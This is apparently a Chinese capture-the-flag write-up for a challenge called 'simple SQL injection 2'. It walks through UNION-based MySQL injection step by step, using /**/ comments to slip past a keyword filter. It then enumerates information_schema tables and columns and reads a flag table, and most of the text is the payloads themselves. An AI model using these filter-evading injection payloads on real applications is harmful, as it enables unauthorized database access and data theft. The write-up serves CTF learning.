简单的sql注入之2

1.查看是否存在注入

1. 输入‘

2. 输入“

3. 1'/**/or/**/1/**/%23

4. 1'/**/and/**/0/**/%23

2.查看select是否被过滤

1. 输入select发现被过滤
   

2. 发现不过滤/**/select/**/
   

3. 存在sql注入

   1. 查看有几列
      1. order by 被过滤 ，试试/**/order/***/by/**/
      2. 1'/**/or/**/1/**/order/**/by/**/1/**/%23，发现显示正常
      
      3. '/**/or/**/1/**/order/**/by/**/2/**/%23，发现没有第二列，说明返回结果只有一列
      

   2. '/**/or/**/1/**/union/**/select/**/11%23，查看显示位
      

4. 获取数据库中的数据

   1. 获取数据库中有哪些表
      '/**/or/**/1/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/tab le_schema/**/=/**/database()/**/%23
      
   2. 发现flag表，获取表中字段
      1'/**/or/**/1/**/union/**/select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_schema/**/=/**/database()/**/and/**/table_name/**/='flag'%23
      
   3. 发现flag表中存在flag字段，获取flag
      '/**/and/**/0/**/union/**/select/**/flag/**/from/**/flag/**/%23